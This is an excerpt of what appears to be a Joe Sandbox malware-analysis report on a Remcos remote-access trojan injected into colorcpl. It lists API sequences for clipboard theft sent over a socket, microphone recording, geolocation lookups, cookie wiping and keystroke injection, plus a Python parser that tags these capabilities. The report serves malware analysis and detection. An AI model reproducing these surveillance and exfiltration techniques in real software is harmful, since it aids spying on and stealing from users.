                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: InputSend
                                        • String ID:
                                        • API String ID: 3431551938-0
                                        • Opcode ID: 256d3e3cd8565ec6bad2012da1f37630189931c2cb4eb4bba2bbbd6c74142495
                                        • Instruction ID: 44701af45c7f777ea4f3354419a728efef77f032d6f89ec2f66c45b37ae7f934
                                        • Opcode Fuzzy Hash: 256d3e3cd8565ec6bad2012da1f37630189931c2cb4eb4bba2bbbd6c74142495
                                        • Instruction Fuzzy Hash: 4E318331554318AEE311CF51D941BEBBBDCEF89B54F00080EF6809A191D2A2A6898BA3
                                        APIs
                                        • OpenClipboard.USER32 ref: 04A94F41
                                        • EmptyClipboard.USER32 ref: 04A94F4F
                                        • CloseClipboard.USER32 ref: 04A94F55
                                        • OpenClipboard.USER32 ref: 04A94F5C
                                        • GetClipboardData.USER32(0000000D), ref: 04A94F6C
                                        • GlobalLock.KERNEL32(00000000), ref: 04A94F75
                                        • GlobalUnlock.KERNEL32(00000000), ref: 04A94F7E
                                        • CloseClipboard.USER32 ref: 04A94F84
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                        • String ID:
                                        • API String ID: 2172192267-0
                                        • Opcode ID: f661c17e56c73b7252efb2719de427c9264c4ab485d0cbe2461d4d8ac07cc1ed
                                        • Instruction ID: b2c3d93b2595a8a3a432ec586bdd7e8494403d4a607ba6eb6be676134247f4f2
                                        • Opcode Fuzzy Hash: f661c17e56c73b7252efb2719de427c9264c4ab485d0cbe2461d4d8ac07cc1ed
                                        • Instruction Fuzzy Hash: 8E0192366092009BE714BB70DD596AE77F8FFA4206F44095EF54B82191EF38AC0BCA51
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 71ebd1c57f70807ba58252d518f310a74526bad8fd4d91ee34a53df22e0b3249
                                        • Instruction ID: a76b293eaf20181ce6108ead7d3aea88f884bf1ffcb28e1a64acd86a6ea9914d
                                        • Opcode Fuzzy Hash: 71ebd1c57f70807ba58252d518f310a74526bad8fd4d91ee34a53df22e0b3249
                                        • Instruction Fuzzy Hash: 5061E271D05209AFEB61CF68C940BAEBBF5EF05724F10807EE955EB240EB70B9418B50
                                        APIs
                                        • _strftime.LIBCMT ref: 04A81D30
                                          • Part of subcall function 04A81A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 04A81AB9
                                        • waveInUnprepareHeader.WINMM(04AEFA78,00000020,00000000,?), ref: 04A81DE2
                                        • waveInPrepareHeader.WINMM(04AEFA78,00000020), ref: 04A81E20
                                        • waveInAddBuffer.WINMM(04AEFA78,00000020), ref: 04A81E2F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                        • String ID: %Y-%m-%d %H.%M$.wav
                                        • API String ID: 3809562944-3597965672
                                        • Opcode ID: aa28d57da419050db2097c30b27822002834f7d5e6121518413b8acbd5e4c756
                                        • Instruction ID: 05c2f4ee7fc3eaee39f22f61ebf98322b6cfe59b08f8b64ea57b8bdebff7b777
                                        • Opcode Fuzzy Hash: aa28d57da419050db2097c30b27822002834f7d5e6121518413b8acbd5e4c756
                                        • Instruction Fuzzy Hash: C8318F71104240AFE314FB61D954EAA77E8FBA4208F80452DF1568B1D0EF74BE0BDB52
                                        APIs
                                          • Part of subcall function 04A91F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 04A91FB5
                                          • Part of subcall function 04A91F91: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 04A91FD2
                                          • Part of subcall function 04A91F91: RegCloseKey.KERNEL32(?), ref: 04A91FDD
                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 04A8AEAC
                                        • PathFileExistsA.SHLWAPI(?), ref: 04A8AEB9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                        • API String ID: 1133728706-4073444585
                                        • Opcode ID: 1b9eb0f214cab7a27aca9f9746a7f994b116ed45b9d827df8e1f5c6a153fc560
                                        • Instruction ID: 716ba7d6c576cadd0700442f9b6583d28c4c7155343f9b8c3cf0abcf3a494d71
                                        • Opcode Fuzzy Hash: 1b9eb0f214cab7a27aca9f9746a7f994b116ed45b9d827df8e1f5c6a153fc560
                                        • Instruction Fuzzy Hash: 97217E71A401186BFF04FBE1DE959FE7778EF65208F84055EA902671C0EE61BD0ACB91
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83282f35ec2dc640d665dc43c5555178d12fb0fb00371cd4756b38a34ef8eda4
                                        • Instruction ID: f4f3e3a00c005b19b5a00bce8c5d5cd17d44a485a28ed3274f92c10a599a5f13
                                        • Opcode Fuzzy Hash: 83282f35ec2dc640d665dc43c5555178d12fb0fb00371cd4756b38a34ef8eda4
                                        • Instruction Fuzzy Hash: 74112972A05214BBEF112F769C04E6B7F6CEF85734B104A19FC97D7150EA35E8018BA1
                                        APIs
                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 04A99392
                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 04A993A8
                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 04A993C1
                                        • InternetCloseHandle.WININET(00000000), ref: 04A99407
                                        • InternetCloseHandle.WININET(00000000), ref: 04A9940A
                                        Strings
                                        • http://geoplugin.net/json.gp, xrefs: 04A993A2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleOpen$FileRead
                                        • String ID: http://geoplugin.net/json.gp
                                        • API String ID: 3121278467-91888290
                                        • Opcode ID: afc8d9533a1bb3409f1356694829d70590e737fb50fd37ac202de6d1baf200e9
                                        • Instruction ID: 5193443fc6a788910fb78684a98e71f75b0b28eb9cb171669857751f1761b636
                                        • Opcode Fuzzy Hash: afc8d9533a1bb3409f1356694829d70590e737fb50fd37ac202de6d1baf200e9
                                        • Instruction Fuzzy Hash: F61182711063227BE724EF269D48EFB7BECEF85664F00043DF94692281DB64AC06C6A1
                                        APIs
                                          • Part of subcall function 04ACDE21: _free.LIBCMT ref: 04ACDE4A
                                        • _free.LIBCMT ref: 04ACE128
                                          • Part of subcall function 04AC3C92: HeapFree.KERNEL32(00000000,00000000,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?), ref: 04AC3CA8
                                          • Part of subcall function 04AC3C92: GetLastError.KERNEL32(?,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?,?), ref: 04AC3CBA
                                        • _free.LIBCMT ref: 04ACE133
                                        • _free.LIBCMT ref: 04ACE13E
                                        • _free.LIBCMT ref: 04ACE192
                                        • _free.LIBCMT ref: 04ACE19D
                                        • _free.LIBCMT ref: 04ACE1A8
                                        • _free.LIBCMT ref: 04ACE1B3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                        • Instruction ID: 8aafd7964e0e2b992d74710a8d1679877bfddcfd2a8c0c05a131f1077cb583a7
                                        • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                        • Instruction Fuzzy Hash: BF112171544B08FAE9A0BBB0CE49FCB779CAF14714F40883EA69E66450DA75B6144750
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                        • Instruction ID: 6d9bfee4b807adb596bff3dd5817b557a09a618c81a852253adee15a0ce81f89
                                        • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                        • Instruction Fuzzy Hash: 09115171988B0CAAD6F0FBB1CE05FCB7BDD5F84710F500925B6BA6E850DA65F5048650
                                        APIs
                                        • GetLastError.KERNEL32(?,?,04AB80F1,04AB705E), ref: 04AB8108
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04AB8116
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04AB812F
                                        • SetLastError.KERNEL32(00000000,?,04AB80F1,04AB705E), ref: 04AB8181
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 44e7bc33812a07f902a722d8b5f3dad62720d3a0cc290b482cec34f374034ae6
                                        • Instruction ID: 865e940660db5245c3fd389a31117cecdfb3745a06693ffc77aa6fa64bae87ee
                                        • Opcode Fuzzy Hash: 44e7bc33812a07f902a722d8b5f3dad62720d3a0cc290b482cec34f374034ae6
                                        • Instruction Fuzzy Hash: 5F01B13224B3116EB7143E7D7C84A9B3A6CEB55778B20432DE5A4586D2EF2A7C025280
                                        APIs
                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 04A8AA1E
                                        • GetLastError.KERNEL32 ref: 04A8AA28
                                        Strings
                                        • [Chrome Cookies not found], xrefs: 04A8AA42
                                        • [Chrome Cookies found, cleared!], xrefs: 04A8AA4E
                                        • UserProfile, xrefs: 04A8A9EE
                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 04A8A9E9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteErrorFileLast
                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                        • API String ID: 2018770650-304995407
                                        • Opcode ID: ab22a391d72fcd55a3a6285fe95ce807a79031d72051a045c6d0a53031c01630
                                        • Instruction ID: 3e5068f6ef5c7b035c7346ff5334a3435de2f3343d2d0756e04c51df0cffbb40
                                        • Opcode Fuzzy Hash: ab22a391d72fcd55a3a6285fe95ce807a79031d72051a045c6d0a53031c01630
                                        • Instruction Fuzzy Hash: C501D171A41008ABAB047BB5DE678BFB728FB61508B80055EE81257690FE12BD16CBD1
                                        APIs
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 04A98DA8
                                        • PlaySoundW.WINMM(00000000,00000000), ref: 04A98DB6
                                        • Sleep.KERNEL32(00002710), ref: 04A98DBD
                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 04A98DC6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                        • String ID: Alarm triggered$`#v
                                        • API String ID: 614609389-3049340936
                                        • Opcode ID: 0510a7c58c78e7395818e452cffef802064e02c1f22af0b8b85bba264805efa9
                                        • Instruction ID: 3b272475693d66db6d40c3c3e356f7960a332363b63c9bc30ba3b60f3f44e8d5
                                        • Opcode Fuzzy Hash: 0510a7c58c78e7395818e452cffef802064e02c1f22af0b8b85bba264805efa9
                                        • Instruction Fuzzy Hash: 79E01A66A411607BBA1037AA6E0FC3F2E6DEBD2A61701009EF90A5A144D9552C028AF2
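The function blocks above are the per-function API sequences that the Joe Sandbox IDA plugin emits for the unpacked Remcos payload in the colorcpl process (dump base 04A80000): a clipboard read of format 0000000D (CF_UNICODETEXT) whose subcall ends in send(), waveIn* recording into a "%Y-%m-%d %H.%M.wav" file, a geoplugin.net/json.gp lookup, Chrome and IE cookie deletion, SendInput keystroke injection, and a PlaySound alarm. The following Python is an added example, not code from Joe Sandbox or from the report: it parses this line format ("• Name.MODULE(args), ref: ADDR", "• text, xrefs: ADDR", the Source File/Snapshot File and String ID lines) into one record per function and maps each record's API set and strings to a capability label. The capability labels, the required-API sets and the clipboard-format table are this example's own assumptions; the sample listing is constructed from the clipboard and geoplugin blocks shown above.

```python
"""Parse Joe Sandbox per-function API listings and tag RAT capabilities.
Added example, not Joe Sandbox code; capability labels are this example's own."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# "• Name.MODULE(args), ref: ADDR"; indirect calls carry a "Part of subcall function" prefix.
_API = re.compile(r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
                  r"(?P<name>.+?)\.(?P<module>[A-Z0-9_]+)"
                  r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
_STR = re.compile(r"^(?P<text>.*), xrefs: [0-9A-F]{8}$")
_SRC = re.compile(r"^Source File: \S+, Offset: (?P<base>[0-9A-F]{8})")
_SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
ApiCall = namedtuple("ApiCall", "name module args ref via_subcall")

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    base: str = ""        # dump base from "Source File: ..., Offset: ..."
    snapshot: str = ""    # .jbxd snapshot name, which carries the hosting process name

    def api_names(self):
        return {a.name for a in self.apis}

    def has_string(self, needle):
        return any(needle in s for s in self.strings)

def parse_listing(text):
    """One FunctionRecord per block; the 'Instruction Fuzzy Hash' line closes a block."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        if line in _SECTIONS:
            section = line
        elif section == "APIs" and (m := _API.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], bool(m["caller"])))
        elif section == "Strings" and (m := _STR.match(line)):
            cur.strings.append(m["text"])
        elif (m := _SRC.match(line)):
            cur.base = m["base"]
        elif line.startswith("Snapshot File: "):
            cur.snapshot = line.split(": ", 1)[1]
        elif line.startswith("String ID: "):
            # The summary joins strings with '$' and survives a collapsed Strings section.
            for s in line[len("String ID: "):].split("$"):
                if s and s not in cur.strings:
                    cur.strings.append(s)
        elif line.startswith("Instruction Fuzzy Hash: "):
            records.append(cur)
            cur = FunctionRecord()
    if cur.apis or cur.strings:
        records.append(cur)
    return records

# (label, APIs that must all appear, substring one of the strings must contain). Assumed thresholds.
CAPABILITIES = [
    ("clipboard read + exfil", {"GetClipboardData", "GlobalLock", "send"}, None),
    ("microphone capture to .wav", {"waveInPrepareHeader", "waveInAddBuffer"}, ".wav"),
    ("geolocation via geoplugin", {"InternetOpenUrlW"}, "geoplugin.net"),
    ("synthetic input (SendInput)", {"SendInput"}, None),
    ("Chrome cookie wipe", {"DeleteFileA"}, "Chrome"),
    ("IE cookie wipe", {"PathFileExistsA"}, "IE cookies"),
]
CLIPBOARD_FORMATS = {"00000001": "CF_TEXT", "0000000D": "CF_UNICODETEXT"}

def capabilities(record):
    names = record.api_names()
    return sorted(label for label, apis, needle in CAPABILITIES
                  if apis <= names and (needle is None or record.has_string(needle)))

def clipboard_format(record):
    """Decode GetClipboardData's uFormat argument, e.g. 0000000D -> CF_UNICODETEXT."""
    for a in record.apis:
        if a.name == "GetClipboardData" and a.args:
            return CLIPBOARD_FORMATS.get(a.args[0], a.args[0])
    return None

# Constructed sample in the report's format: the clipboard block, then the geoplugin block.
SAMPLE = """APIs
• OpenClipboard.USER32 ref: 04A94F41
• GetClipboardData.USER32(0000000D), ref: 04A94F6C
• GlobalLock.KERNEL32(00000000), ref: 04A94F75
• CloseClipboard.USER32 ref: 04A94F84
  • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
Memory Dump Source
• Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
• Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
• Instruction Fuzzy Hash: 8E0192366092009BE714BB70DD596AE77F8FFA4206F44095EF54B82191EF38AC0BCA51
APIs
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 04A993A8
Strings
• http://geoplugin.net/json.gp, xrefs: 04A993A2
Similarity
• String ID: http://geoplugin.net/json.gp
• Instruction Fuzzy Hash: F61182711063227BE724EF269D48EFB7BECEF85664F00043DF94692281DB64AC06C6A1
"""

if __name__ == "__main__":
    for rec in parse_listing(SAMPLE):
        print(rec.snapshot or "-", rec.base, capabilities(rec), clipboard_format(rec))
```

Subcall APIs are kept in the record (flagged via_subcall) because the exfiltration step here is exactly such an indirect call: the clipboard function itself only reads, and send() is reached through 04A84A81. Matching on the API set rather than on a single API keeps GlobalLock or send alone from triggering the clipboard label.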
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID: pF
                                        • API String ID: 269201875-2973420481
                                        • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                        • Instruction ID: 8b32d1faf40f7e9f88c375647bb760112b9c4aa740f2fac8e2522575c3ca1749
                                        • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                        • Instruction Fuzzy Hash: 3FF030BA8051248BC782EF55BD404143FE4BB08B34B261536F9B8EEA70F7B105468F8E
                                        APIs
                                        • __allrem.LIBCMT ref: 04AB8A09
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04AB8A25
                                        • __allrem.LIBCMT ref: 04AB8A3C
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04AB8A5A
                                        • __allrem.LIBCMT ref: 04AB8A71
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04AB8A8F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                        • Instruction ID: 304b9d40cf2936835814349f6b7317ba6cad5e94920efa42d825a2685f5a4ff2
                                        • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                        • Instruction Fuzzy Hash: 8281E472600706ABEB24BF6CCD40BEA73ACAF44768F14452EE595D6682E778F90087D0
                                        APIs
                                        • __allrem.LIBCMT ref: 069097CE
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 069097EA
                                        • __allrem.LIBCMT ref: 06909801
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0690981F
                                        • __allrem.LIBCMT ref: 06909836
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 06909854
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                        • Instruction ID: 0302034ed37774d136b7aee943a3c221875ed099783b355c2eacc9f6d802cbac
                                        • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                        • Instruction Fuzzy Hash: 0581E972E007069FF7A4DE68CC40BAA73AD9F80764F34552AE521DBAC1EB75D9408B90
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __cftoe
                                        • String ID:
                                        • API String ID: 4189289331-0
                                        • Opcode ID: 5cbdf4f4ee6b8492bc1050fa470959f33c7f490e1b96f59a140e7af61609c41c
                                        • Instruction ID: 50e7a03542ec3e83b323b847ce7fcc1f0cf212e0aaadd7b7e1facd43a97028d8
                                        • Opcode Fuzzy Hash: 5cbdf4f4ee6b8492bc1050fa470959f33c7f490e1b96f59a140e7af61609c41c
                                        • Instruction Fuzzy Hash: 0A51FB33D00209EBEF65AF688D44FAE7BA8AF48334F10429DE815A61C1EB31F55086A4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __cftoe
                                        • String ID:
                                        • API String ID: 4189289331-0
                                        • Opcode ID: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                        • Instruction ID: 487a79211df791033b5ce0fcc4f7e2132daffa5421c54880f0cb9d4def4ab3fe
                                        • Opcode Fuzzy Hash: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                        • Instruction Fuzzy Hash: 8851EB76D0020DABEFE49B688C44EAD77BDEF89730F34421AF8299E981DB31C500C664
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __freea$__alloca_probe_16_free
                                        • String ID: a/p$am/pm
                                        • API String ID: 2936374016-3206640213
                                        • Opcode ID: fa266bc5a4e9b2f4a7aca99f1c6d6cab829aa780d45841e64fd666f8f7516dd9
                                        • Instruction ID: 1dfbd4a26d51c2fe23abd80d797965854562bd57981c316dfbd6e8a414abb3dc
                                        • Opcode Fuzzy Hash: fa266bc5a4e9b2f4a7aca99f1c6d6cab829aa780d45841e64fd666f8f7516dd9
                                        • Instruction Fuzzy Hash: 45D12831A04215DBDBA99F68CA74BFABBB1FF0D300F15425EE905AB250E735B940CB58
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 04A8F8C4
                                        • int.LIBCPMT ref: 04A8F8D7
                                          • Part of subcall function 04A8CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 04A8CAFA
                                          • Part of subcall function 04A8CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 04A8CB14
                                        • std::_Facet_Register.LIBCPMT ref: 04A8F917
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 04A8F920
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04A8F93E
                                        • __Init_thread_footer.LIBCMT ref: 04A8F97F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                        • String ID:
                                        • API String ID: 3815856325-0
                                        • Opcode ID: a9ec66a17d0dd05923ab1d5d6ed307d275a43f026824a22e83191effa8bd7407
                                        • Instruction ID: 37caf912bf786a8a4e8d7da0864b87914e2d58f119ddaf7995880fc6715fcc7b
                                        • Opcode Fuzzy Hash: a9ec66a17d0dd05923ab1d5d6ed307d275a43f026824a22e83191effa8bd7407
                                        • Instruction Fuzzy Hash: 2921F632900114BFEB14FBE8DA449DD776CDF44228B60019EFA51AB291DF35BE418BE0
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 068E0689
                                        • int.LIBCPMT ref: 068E069C
                                          • Part of subcall function 068DD8AE: std::_Lockit::_Lockit.LIBCPMT ref: 068DD8BF
                                          • Part of subcall function 068DD8AE: std::_Lockit::~_Lockit.LIBCPMT ref: 068DD8D9
                                        • std::_Facet_Register.LIBCPMT ref: 068E06DC
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 068E06E5
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 068E0703
                                        • __Init_thread_footer.LIBCMT ref: 068E0744
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                        • String ID:
                                        • API String ID: 3815856325-0
                                        APIs
                                        • GetLastError.KERNEL32(?,00000000,04ABF143,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC5729
                                        • _free.LIBCMT ref: 04AC575C
                                        • _free.LIBCMT ref: 04AC5784
                                        • SetLastError.KERNEL32(00000000,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC5791
                                        • SetLastError.KERNEL32(00000000,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC579D
                                        • _abort.LIBCMT ref: 04AC57A3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
